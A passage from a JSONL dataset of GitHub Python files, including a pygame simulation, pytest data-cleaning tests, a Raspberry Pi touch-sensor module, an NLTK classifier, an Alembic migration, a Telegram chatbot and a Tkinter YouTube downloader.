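            # poll pygame events until an arrow key chooses the move direction\r\n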
            for event in pygame.event.get():\r\n                if event.type == pygame.KEYDOWN:\r\n                    if event.key == pygame.K_UP:\r\n                        temp.y = -1\r\n                        case = False\r\n                    elif event.key == pygame.K_DOWN:\r\n                        temp.y = 1\r\n                        case = False\r\n                    elif event.key == pygame.K_RIGHT:\r\n                        temp.x = 1\r\n                        case = False\r\n                    elif event.key == pygame.K_LEFT:\r\n                        temp.x = -1\r\n                        case = False\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n                sys.exit()\r\n        self.makeMoveToField(temp, counter)\r\n\r\n    def collision(self, org):\r\n        if not self._world.getSuperPower() or self.getStrength() > org.getStrength():\r\n            super().collision(org)\r\n        else:\r\n            newCoo = self._world.findField(self.getLoc().y, self.getLoc().x)\r\n            if not self._world.isOutside(newCoo):\r\n                self.move(newCoo)\r\n","repo_name":"kobas172/world-simulation-python","sub_path":"app/Organisms/Animals/Human.py","file_name":"Human.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"9148597225","text":"money = int(input(\"How much money would you like to exchange? \"))\n\nc500 = money //500\nchange = money % 500\n\nc100 = change // 100\nchange = change % 100\n\nc50 = change // 50\nchange = change % 50\n\nc10 = change // 10\nchange = change % 10\n\nprint(\"\\n500-won coins : {}\".format(c500))\nprint(\"\\n100-won coins : {}\".format(c100))\nprint(\"\\n50-won coins : {}\".format(c50))\nprint(\"\\n10-won coins : {}\".format(c10))\nprint(\"Change that could not be exchanged : {}\".format(change))\n","repo_name":"sdoohee/TIL","sub_path":"Python/pythonWorkspace/ch03-operators/03-operators-ex2.py","file_name":"03-operators-ex2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39160192678","text":"import pytest\nimport pandas as pd\n\nfrom src.modeling.clean import aggregate_by_keys, transform_vars, method_to_func\n\ndf_in = pd.DataFrame([['3.0L', '24995'],\n                      ['3.0L', 10995],\n                      ['3.0L', '57990'],\n                      ['1.0L', 5107],\n                      ['2.0L', 23000],\n                      ['2.2L', 11999],\n                      ['1.6L', 1295],\n                      ['2.2L', 17990],\n                      ['2.0L', 2865],\n                      ['3.0L', 2490],\n                      ['2.2L', 2694],\n                      ['1.9L', 1290],\n                      ['1.2L', 13795],\n                      ['2.0L', '25989'],\n                      ['1.33L', '5950'],\n                      ['2.4L', '7495'],\n                      ['1.8L', '2795'],\n                      ['1.7L', '4799'],\n                      ['1.4L', 14791],\n                      ['1.6L', 6995]], columns=['engin_size', 'price'])\ntransformation = {'vars_strip_numeric': ['engin_size'],\n                  'vars_drop_non_numeric_rows': ['price']}\n\ndf_in_2 = pd.DataFrame([['Hyundai', 2018, 5.0, 4.0],\n                        ['Dacia', 2018, 5.0, 5.0],\n                        ['Volkswagen', 2018, 5.0, 5.0],\n                        ['Jaguar', 2017, 5.0, 4.0],\n                        ['Mercedes-Benz', 2021, 5.0, 5.0],\n                        ['Mitsubishi', 2018, 5.0, 3.0],\n                        ['Land Rover', 2018, 5.0, 5.0],\n                        ['MINI', 2018, 2.0, 2.0],\n                        ['Renault', 2020, 5.0, 5.0],\n                        ['Peugeot', 2018, 5.0, 5.0],\n                        ['Land Rover', 2021, 5.0, 5.0],\n                        ['Subaru', 2018, 5.0, 5.0],\n                        ['Peugeot', 2018, 5.0, 5.0],\n                        ['Renault', 2018, 5.0, 5.0],\n                        ['Mercedes-Benz', 2018, 5.0, 5.0],\n                        ['Kia', 2018, 5.0, 3.0],\n                        ['Jaguar', 2018, 2.0, 2.0],\n                        ['Jaguar', 2018, 5.0, 4.0],\n                        ['Ford', 2018, 7.0, 5.0],\n                        ['Ford', 2018, 5.0, 5.0]], columns=['maker', 'year', 'seat_num', 'door_num'])\naggregation = {\n    'key_cols': ['maker', 'year'],\n    'key_path': 'data/processed/teskeys.csv',\n    'agg_cols_transforms': {\n        'seat_num': 'first',\n        'door_num': 'mode'\n    }\n}\n\n\ndef test_transform_vars_expected() -> None:\n    \"\"\"\n    Test if `transform_vars` works as expected.\n    \"\"\"\n    df_true = pd.DataFrame([[3.0000e+00, 2.4995e+04],\n                            [3.0000e+00, 1.0995e+04],\n                            [3.0000e+00, 5.7990e+04],\n                            [1.0000e+00, 5.1070e+03],\n                            [2.0000e+00, 2.3000e+04],\n                            [2.2000e+00, 1.1999e+04],\n                            [1.6000e+00, 1.2950e+03],\n                            [2.2000e+00, 1.7990e+04],\n                            [2.0000e+00, 2.8650e+03],\n                            [3.0000e+00, 2.4900e+03],\n                            [2.2000e+00, 2.6940e+03],\n                            [1.9000e+00, 1.2900e+03],\n                            [1.2000e+00, 1.3795e+04],\n                            [2.0000e+00, 2.5989e+04],\n                            [1.3300e+00, 5.9500e+03],\n                            [2.4000e+00, 7.4950e+03],\n                            [1.8000e+00, 
2.7950e+03],\n [1.7000e+00, 4.7990e+03],\n [1.4000e+00, 1.4791e+04],\n [1.6000e+00, 6.9950e+03]],\n columns=['engin_size', 'price'])\n df_true['price'] = df_true['price'].astype(int)\n\n df_out = transform_vars(data=df_in, transformation=transformation)\n\n # Test that the true and test are the same\n pd.testing.assert_frame_equal(df_true, df_out)\n\n\ndef test_transform_vars_unexpected() -> None:\n \"\"\"\n Test if `transform_vars` raises error when encountering unexpected input.\n We expect a type error when input is not a data frame.\n \"\"\"\n df_in_str = 'I am not a dataframe'\n\n with pytest.raises(TypeError):\n transform_vars(data=df_in_str, transformation=transformation)\n\n\ndef test_aggregate_by_keys_expected() -> None:\n \"\"\"\n Test if `aggregate_by_keys` works as expected.\n \"\"\"\n df_true = pd.DataFrame([[0, 'Dacia', 2018, 5.0, 5.0],\n [1, 'Ford', 2018, 7.0, 5.0],\n [2, 'Hyundai', 2018, 5.0, 4.0],\n [3, 'Jaguar', 2017, 5.0, 4.0],\n [4, 'Jaguar', 2018, 2.0, 2.0],\n [5, 'Kia', 2018, 5.0, 3.0],\n [6, 'Land Rover', 2018, 5.0, 5.0],\n [7, 'Land Rover', 2021, 5.0, 5.0],\n [8, 'MINI', 2018, 2.0, 2.0],\n [9, 'Mercedes-Benz', 2018, 5.0, 5.0],\n [10, 'Mercedes-Benz', 2021, 5.0, 5.0],\n [11, 'Mitsubishi', 2018, 5.0, 3.0],\n [12, 'Peugeot', 2018, 5.0, 5.0],\n [13, 'Renault', 2018, 5.0, 5.0],\n [14, 'Renault', 2020, 5.0, 5.0],\n [15, 'Subaru', 2018, 5.0, 5.0],\n [16, 'Volkswagen', 2018, 5.0, 5.0]],\n columns=['newcol', 'maker', 'year', 'seat_num', 'door_num'])\n\n df_out = aggregate_by_keys(\n data=df_in_2,\n aggregation=aggregation,\n new_index='newcol'\n )\n\n # Test that the true and test are the same\n pd.testing.assert_frame_equal(df_true, df_out)\n\n\ndef test_aggregate_by_keys_unexpected() -> None:\n \"\"\"\n Test if `aggregate_by_keys` raises error when encountering unexpected input.\n We expect a key error when key column does not exist.\n \"\"\"\n df_in_3 = pd.DataFrame([[0, 1, 2, 3]], columns=[\n 'col1', 'col2', 'col3', 'col4'])\n\n with pytest.raises(KeyError):\n aggregate_by_keys(\n data=df_in_3,\n aggregation=aggregation,\n new_index='newcol'\n )\n\n\ndef test_method_to_func_expected_mean() -> None:\n \"\"\"\n Test if `method_to_func` works as expected for mean.\n \"\"\"\n assert method_to_func('mean') == 'mean'\n\n\ndef test_method_to_func_expected_first() -> None:\n \"\"\"\n Test if `method_to_func` works as expected for first.\n \"\"\"\n assert method_to_func('first') == 'first'\n\n\ndef test_method_to_func_unexpected() -> None:\n \"\"\"\n Test if `method_to_func` return None when receiving unexpected input.\n \"\"\"\n assert method_to_func('not_a_method') is None\n","repo_name":"hcai98/Car-Recommender","sub_path":"tests/test_clean.py","file_name":"test_clean.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5101812162","text":"import RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\n\n#Pins= [Pad0, Pad1, Pad2, Pad3, Pad4]\nPADS = [24, 23, 18, 15, 14]\t# Touch Pad BCM Pins ; Use NoneType if Pad is not in use\n\ndef setup():\n\tglobal PADS\n\n\tfor pin in PADS:\n\t\tif (pin is not None):\n\t\t\tGPIO.setup(pin, GPIO.IN)\n\n\tprint(\"All pins have been set up successfully!\")\n\treturn True\n\n\"\"\"\nNote:\nSince only 1 Touch Pad can be used at a time, I chose to create a function which responds to the corresponding Pad.\nI also thought that we may not know which pad is being used or may just want to check all the pads so I created\nanother function which would check for 
which pad was activated.\n\nFilled in functions for testing purposes.\nGPIO input of each pad is HIGH when untouched. LOW when touched.\nFunctions test for when the Pad is LOW.\nAttempted to touch multiple pads and as expected, only 1 pad can be used at any given time.\n\n\nRead_Pad(input) function is used to know if Pad# is ON/OFF for use in greater applications.\n\nRead_All() function would check for which Pad# is activated when called.\n\nWait_All() function is used to implement interrupts for all the Touch Pads.\n\nWait_Pad(input) functin is used to implement an interrupt for the specified Touch Pad.\n\"\"\"\n\n\n# Read State of Pad#\ndef Read_Pad(input):\n\t\"\"\"\n\tAccepts pad # to read state.\n\tReturns Pad state\n\tState: 1 = Not Active\n\t 0 = Active\n\t None = Incorrect Pad # / Pad not setup\n\t\"\"\"\n\tglobal PADS\n\n\tif (PADS[input] is not None):\n\t\treturn GPIO.input(PADS[input])\n\treturn None\n\n# Search for which pad is activated\ndef Read_All():\n\t\"\"\"\n\tReads all pad states.\n\tReturns pad# of active pad.\n\tIf none are active, return None.\n\t\"\"\"\n\n\tfor pad in range(5):\n\t\tif (Read_Pad(pad) == 0):\n\t\t\treturn pad\n\treturn None\n\n# Create Interrupt for Pad#\ndef Wait_Pad(input):\n\tglobal PADS\n\n\tif (PADS[input] is not None):\n\t\tGPIO.add_event_detect(PADS[input], GPIO.FALLING)\n\t\tprint(\"Pad Interrupt \" + str(input) + \" setup correctly!\")\n\t\treturn True\n\tprint(\"Touch Pad \" + str(input) + \" is not setup...\")\n\treturn False\n\n\n# Create Interrupts for all Pads\ndef Wait_All():\n\tfor pad in range(5):\n\t\tWait_Pad(pad)\n\treturn True\n\n","repo_name":"LBP311/Origami-Electronics","sub_path":"touch_sensor.py","file_name":"touch_sensor.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34044896835","text":"import nltk\nimport collections\nfrom nltk.classify import NaiveBayesClassifier\nfrom nltk.metrics import precision, recall, f_measure\nimport datetime\nimport pickle\nfrom statistics import mode\nimport os\n\nfrom nltk.classify import ClassifierI\n\nclass VoteClassifier(ClassifierI):\n def __init__(self, *classifiers):\n self._classifiers = classifiers\n\n def classify(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n return mode(votes)\n\n def confidence(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n\n choice_votes = votes.count(mode(votes))\n conf = choice_votes / len(votes)\n return conf\n\n\ndef classify(features, source, type):\n dir_path = os.path.dirname(__file__)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/MNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n MNB_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/BernoulliNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n BernoulliNB_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LogisticRegression_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LogisticRegression_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LinearSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LinearSVC_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = 
os.path.join(dir_path, source + '/pickled/' + type + '/NuSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n NuSVC_classifier = pickle.load(open_file)\n open_file.close()\n\n voted_classifier = VoteClassifier(\n NuSVC_classifier,\n LinearSVC_classifier,\n MNB_classifier,\n BernoulliNB_classifier,\n LogisticRegression_classifier)\n\n return voted_classifier.classify(features), voted_classifier.confidence(features)\n\n\ndef test(trainfeats, testfeats, source, type):\n # print('train on %d instances, test on %d instances' % (len(trainfeats), len(testfeats)))\n\n my_classifier = NaiveBayesClassifier.train(trainfeats)\n refsets = collections.defaultdict(set)\n testsets = collections.defaultdict(set)\n\n for i, (feats, label) in enumerate(testfeats):\n refsets[label].add(i)\n observed = my_classifier.classify(feats)\n testsets[observed].add(i)\n\n # precision and recall\n accuracy = nltk.classify.util.accuracy(my_classifier, testfeats) * 100\n pos_prec = precision(refsets['pos'], testsets['pos']) * 100\n pos_rec = recall(refsets['pos'], testsets['pos']) * 100\n neg_prec = precision(refsets['neg'], testsets['neg']) * 100\n neg_rec = recall(refsets['neg'], testsets['neg']) * 100\n\n # round\n accuracy = round(accuracy, 1)\n pos_prec = round(pos_prec, 1)\n pos_rec = round(pos_rec, 1)\n neg_prec = round(neg_prec, 1)\n neg_rec = round(neg_rec, 1)\n\n # print('pos F-measure:', f_measure(refsets['pos'], testsets['pos']))\n # print('neg F-measure:', f_measure(refsets['neg'], testsets['neg']))\n my_classifier.show_most_informative_features(50)\n\n dir_path = os.path.dirname(__file__)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/MNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n MNB_classifier = pickle.load(open_file)\n open_file.close()\n mnb = (nltk.classify.accuracy(MNB_classifier, testfeats)) * 100\n print(mnb)\n mnb = round(mnb, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/BernoulliNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n BernoulliNB_classifier = pickle.load(open_file)\n open_file.close()\n bnb = (nltk.classify.accuracy(BernoulliNB_classifier, testfeats)) * 100\n print(bnb)\n bnb = round(bnb, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LogisticRegression_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LogisticRegression_classifier = pickle.load(open_file)\n open_file.close()\n lr = (nltk.classify.accuracy(LogisticRegression_classifier, testfeats)) * 100\n print(lr)\n lr = round(lr, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LinearSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LinearSVC_classifier = pickle.load(open_file)\n open_file.close()\n lsvc = (nltk.classify.accuracy(LinearSVC_classifier, testfeats)) * 100\n print(lsvc)\n lsvc = round(lsvc, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/NuSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n NuSVC_classifier = pickle.load(open_file)\n open_file.close()\n nsvc = (nltk.classify.accuracy(NuSVC_classifier, testfeats)) * 100\n print(nsvc)\n nsvc = round(nsvc, 1)\n\n voted_classifier = VoteClassifier(\n NuSVC_classifier,\n LinearSVC_classifier,\n MNB_classifier,\n BernoulliNB_classifier,\n LogisticRegression_classifier)\n\n voted = (nltk.classify.accuracy(voted_classifier, testfeats)) * 100\n print(voted)\n voted = round(voted, 1)\n\n nltk_output = \"nlt, \" + str(accuracy) + \", \" + str(pos_prec) + \", \" + str(neg_prec) + 
\", \" + str(pos_rec) + \", \" + str(neg_rec) + \"\\n\"\n    sklearn_output = \"skl, \" + str(mnb) + \", \" + str(bnb) + \", \" + str(lr) + \", \" + str(lsvc) + \", \" + str(nsvc) + \", \" + str(voted) + \"\\n\"\n\n    return (nltk_output, sklearn_output)\n\n\nif __name__ == '__main__':\n    COUNT = 60000\n    cut = int((COUNT/2)*19/20)\n    source = \"twitter\"\n    type = \"60000\"\n\n    # corpora = crp.Corpora(\"stanford\", count=COUNT)\n    # features = ftr.Features(corpora, total=COUNT, bigram=True, stem=\"porter\", pos=[\"CD\"])\n\n\n    dir_path = os.path.dirname(__file__)\n    file_path = os.path.join(dir_path, source + '/pickled/' + type + '/NuSVC_classifier.pickle')\n    features_f = open(file_path, \"rb\")\n    features = pickle.load(features_f)\n    features_f.close()\n\n    posfeats = features.get_features_pos()\n    negfeats = features.get_fearures_neg()\n\n    trainfeats = negfeats[:cut] + posfeats[:cut]\n    testfeats = negfeats[cut:] + posfeats[cut:]\n\n    print('train on %d instances, test on %d instances' % (len(trainfeats), len(testfeats)))\n    nlt, skl = test(trainfeats, testfeats, source, type)\n    print(nlt, skl)","repo_name":"bromjiri/Presto","sub_path":"trainer/classifier_load.py","file_name":"classifier_load.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"32800572693","text":"from distutils.core import setup\nfrom Cython.Build import cythonize\nfrom distutils.extension import Extension\nimport numpy as np\nimport os\n\n# Add non-ROS install locations\ninclude_dirs = [\"/usr/local/include\", np.get_include()]\nlibrary_dirs = [\"/usr/local/lib\"]\n\n# Get a list of all package locations\nros_package_paths = os.environ['ROS_PACKAGE_PATH']\nfor path in ros_package_paths.split(\":\"):\n    # One of these will be\n    # .../catkin_ws/src/\n    include_dir1 = os.path.abspath(os.path.join(path, \"../install/include\"))\n    library_dir1 = os.path.abspath(os.path.join(path, \"../devel/lib\"))\n    include_dir2 = os.path.abspath(os.path.join(path, \"../../install/include\"))\n    library_dir2 = os.path.abspath(os.path.join(path, \"../../devel/lib\"))\n    include_dirs.append(include_dir1)\n    library_dirs.append(library_dir1)\n    include_dirs.append(include_dir2)\n    library_dirs.append(library_dir2)\n\nextensions = [\n    Extension(\n        \"scan_simulator_2d\",\n        [\"scan_simulator_2d.pyx\"],\n        libraries=[\"racecar_simulator\"],\n        include_dirs=include_dirs,\n        library_dirs=library_dirs,\n        language='c++',\n        extra_compile_args=[\"-std=c++11\", \"-O2\", \"-O3\"],\n        extra_link_args=[\"-std=c++11\"]\n    )]\n\nsetup(\n    ext_modules=cythonize(extensions)\n)\n","repo_name":"mit-rss/localization","sub_path":"src/localization/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"}
{"seq_id":"14202270462","text":"#from googletrans import Translator\n\n#trans = Translator()\n#t = trans.translate(\n#    'hello', src= 'en', dest='de'\n#)\n#print(f'Source: {t.src}')\n#print(f'Destination: {t.dest}')\n#print(f'{t.origin} -> {t.text}')\nfrom deep_translator import GoogleTranslator\nimport codecs\nlangs_list = GoogleTranslator.get_supported_languages()\nlangs_dict = GoogleTranslator.get_supported_languages(as_dict=True)\nprint(langs_dict)\ntranslated = GoogleTranslator(source='auto', target='afrikaans').translate_file('C:\\\\Users\\\\CyrusSmith\\\\Desktop\\\\test\\\\Split files\\\\home-page(listreet)-en_0.html')\nprint(translated)\n
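# write the translated markup back out as a UTF-8 file\n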
f = codecs.open('C:\\\\Users\\\\CyrusSmith\\\\Desktop\\\\test\\\\Split files\\\\home-page(listreet)-af0.html', 'w', 'utf-8')\nf.write(translated)\nf.close()","repo_name":"CyrusTheVirusSmith/website-page-translation","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"14717427069","text":"\"\"\"empty message\n\nRevision ID: af3ec20c9bb7\nRevises: \nCreate Date: 2023-03-13 16:54:55.226507\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'af3ec20c9bb7'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('blocklist',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('jti', sa.String(length=36), nullable=False),\n    sa.Column('created_at', sa.DateTime(), nullable=True),\n    sa.PrimaryKeyConstraint('id')\n    )\n    with op.batch_alter_table('blocklist', schema=None) as batch_op:\n        batch_op.create_index(batch_op.f('ix_blocklist_jti'), ['jti'], unique=False)\n\n    op.create_table('course',\n    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('name', sa.String(length=45), nullable=False),\n    sa.Column('teacher', sa.String(length=45), nullable=False),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('name')\n    )\n    op.create_table('user',\n    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('first_name', sa.String(length=45), nullable=False),\n    sa.Column('last_name', sa.String(length=45), nullable=False),\n    sa.Column('student_id', sa.String(length=15), nullable=True),\n    sa.Column('email', sa.String(length=50), nullable=False),\n    sa.Column('password', sa.String(length=40), nullable=False),\n    sa.Column('enrollment_status', sa.Enum('ACTIVE', 'WAITLIST', 'EXPELLED', 'ADMIN', name='enrollmentstatus'), nullable=False),\n    sa.Column('date_created', sa.DateTime(), nullable=True),\n    sa.Column('is_admin', sa.Boolean(), nullable=True),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('email'),\n    sa.UniqueConstraint('student_id')\n    )\n    op.create_table('score',\n    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('score', sa.Integer(), nullable=False),\n    sa.Column('user_id', sa.Integer(), nullable=True),\n    sa.Column('course_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),\n    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_table('user_course',\n    sa.Column('user_id', sa.Integer(), nullable=True),\n    sa.Column('course_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),\n    sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('user_course')\n op.drop_table('score')\n op.drop_table('user')\n op.drop_table('course')\n with op.batch_alter_table('blocklist', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_blocklist_jti'))\n\n op.drop_table('blocklist')\n # ### end Alembic commands ###\n","repo_name":"PromPromm/student-management-api","sub_path":"migrations/versions/af3ec20c9bb7_.py","file_name":"af3ec20c9bb7_.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33678462350","text":"import numpy as np\nimport string\nimport re\nimport joblib\nfrom util import JSONParser\nfrom Sastrawi.Stemmer.StemmerFactory import StemmerFactory\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\n\n# Function for Processing Chat from user\ndef chat_processing(chat):\n # Transform Chat Into Lowercase\n chat = chat.lower()\n\n # Remove Punctuation From Chat\n chat = chat.translate(str.maketrans(\"\",\"\",string.punctuation))\n\n # Remove Digit From Chat\n chat = re.sub(\"[^A-Za-z\\s']\",\" \", chat)\n\n # Remove Tab From Chat\n chat = chat.strip()\n\n # Stemmer Definition\n stemmer = StemmerFactory().create_stemmer()\n\n # Stemming Chat\n chat = stemmer.stem(chat)\n\n return chat\n\ndef response(chat, pipeline, jp):\n chat = chat_processing(chat)\n res = pipeline.predict_proba([chat])\n max_prob = max(res[0])\n if max_prob < 0.2:\n return \"Mohon maaf nih kak, aku masih belum ngerti maksud kakak :(\" , None\n else:\n max_id = np.argmax(res[0])\n pred_tag = pipeline.classes_[max_id]\n return jp.get_response(pred_tag)\n\ndef start(update, context):\n update.message.reply_text(\"Selamat!, kakak telah terhubung dengan Gitcoff, sebuah Chatbot AI dari Git Coffee 😉\")\n\ndef respons(update, context):\n chat = update.message.text\n res = response(chat, model, jp)\n update.message.reply_text(res)\n\n# Main\n# Load dataset Intents for Bot Responses\npath = \"dataset/intents.json\"\njp = JSONParser()\njp.parse(path)\ndf = jp.get_dataframe()\n\n# Initiate Bot Token from BotFather\ntoken = 'YOUR TELEGRAM BOT API TOKEN'\nupdater = Updater(token, use_context=True)\ndp = updater.dispatcher\n\n# Load Chatbot Machine Learning Model\nmodel = joblib.load(\"chatbot.pkl\")\n\n# Command\ndp.add_handler(CommandHandler(\"start\",start))\n\n# Message Handler\ndp.add_handler(MessageHandler(Filters.text, respons))\n\n# Run Bot\nupdater.start_polling()\nupdater.idle()","repo_name":"Theo1107/Git-Cofee-Chatbot","sub_path":"gitcoff_telebot.py","file_name":"gitcoff_telebot.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27280348551","text":"from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom pytube import YouTube\r\nimport shutil\r\nimport os\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"YouTube Downloader\")\r\n\r\n\r\ndef download_highest_res():\r\n\r\n get_url = url_enter.get() # Gets the YT URL\r\n user_path = path_label.cget(\"text\") # Gets the path the user chose\r\n root.title(\"Downloading...\")\r\n mp4_highest = YouTube(get_url).streams.get_highest_resolution().download()# Download highest resolution vid\r\n shutil.move(mp4_highest, user_path)\r\n root.title(\"Download complete!\")\r\n\r\ndef download_mpthree():\r\n get_url = url_enter.get() # Gets the YT URL\r\n user_path = path_label.cget(\"text\") # Gets the path the user chose\r\n root.title(\"Downloading...\")\r\n mpthree = 
YouTube(get_url).streams.filter(only_audio=True).first().download() # Download highest audio sample\r\n base, ext = os.path.splitext(mpthree)\r\n new_file = base + \".mp3\"\r\n os.rename(mpthree, new_file)\r\n shutil.move(new_file, user_path)\r\n root.title(\"Download complete!\")\r\n\r\ndef show():\r\n final = \"\"\r\n confirm_label = Label(root, text=clicked.get())\r\n final = clicked.get()\r\n custom_download(final)\r\n\r\ndef custom_download(resolution):\r\n get_url = url_enter.get() # Gets the YT URL\r\n user_path = path_label.cget(\"text\") # Gets the path the user chose\r\n root.title(\"Downloading...\")\r\n mp4_custom = YouTube(get_url).streams.filter(res=resolution).first().download()\r\n shutil.move(mp4_custom, user_path)\r\n root.title(\"Download complete!\")\r\n\r\n\r\n# Dropdown menu\r\nclicked = StringVar()\r\nclicked.set(\"choose\")\r\ndrop = OptionMenu(root, clicked, \"360p\", \"480p\", \"720p\", \"1080p\")\r\n\r\n#button to the right of the dropdown list\r\ncustom_final_download = Button(root, text=\"Confirm\", bg='grey', padx=20, pady=20, command=show)\r\n\r\n\r\n\r\ndef path_selection():\r\n path = filedialog.askdirectory() # allows user to select a path from the file explorer\r\n path_label.config(text=path)\r\n\r\n# defining stuff\r\nenter_youtube_label = Label(root, text=\"Enter a YouTube URL:\", font=('Arial',30))\r\nurl_enter = Entry(root, width=80)\r\npath_label = Label(root, text=\"Select path for the download:\\n\", font=('Arial',20))\r\npath_button = Button(root, text=\"Path\", bg='grey', padx=30, pady=20, command=path_selection)\r\ndownload_explanation = Label(root, text=\"CHOOSING A PATH IS MANDATORY\\nRed Button: Highest Resolution, Green Button: Mp3\", font=('Arial',13))\r\ncustom_label_below = Label(root, text=\"Custom Resolution? Choose Below:\\n\", font=('Arial',20))\r\nextra_bottom_space = Label(root, text=\"\\n\")\r\nextra_bottom_space2 = Label(root, text=\"\\n\")\r\ndrop.configure(bg=\"grey\")\r\n#options defined buttons\r\ndownload_button_highest = Button(root, text=\"Highest\", bg='red', padx=30, pady=20, command=download_highest_res)\r\ndownload_audio = Button(root, text=\"Audio\", bg='Green', padx=30, pady=20, command=download_mpthree)\r\n\r\n\r\n\r\n\r\n\r\n# Placing onto the screen\r\nenter_youtube_label.grid(row=1, column=1, columnspan=3)\r\nurl_enter.grid(row=2, column=1, columnspan=3)\r\npath_label.grid(row=3, column=1, columnspan=3)\r\ndownload_button_highest.grid(row=4, column=1)\r\npath_button.grid(row=4, column=2)\r\ndownload_audio.grid(row=4, column=3)\r\nextra_bottom_space.grid(row=5, column=1, columnspan=3)\r\ndownload_explanation.grid(row=6, column=1, columnspan=3)\r\ncustom_label_below.grid(row=7, column=1, columnspan=3)\r\ndrop.grid(row=8, column=1, columnspan=2)\r\ncustom_final_download.grid(row=8, column=2, columnspan=3)\r\nextra_bottom_space2.grid(row=9)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nroot.mainloop()","repo_name":"Jake-JD/YT_Downloader","sub_path":"YT_Tkinter.py","file_name":"YT_Tkinter.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74818064803","text":"# * 题目要求:\n# * 使用Pandas查看数据文件的基本信息\n# * 使用Pandas进行数据分析及可视化\n#\n# * 数据文件:\n# * 数据源下载地址:https://video.mugglecode.com/Beijing_PM.csv\n# * Beijing_PM.csv,包含了2013-2015年北京每小时的PM2.5值。每行记录为1小时的数据。\n# * 共7列数据,分别表示:\n# 1. year: 年,2013-2015\n# 2. month: 月,1-12\n# 3. day: 日,1-31\n# 4. hour: 小时,0-23\n# 5. season:季度,1-4\n# 6. PM_China: 中国环保部检测的PM2.5值\n# 7. 
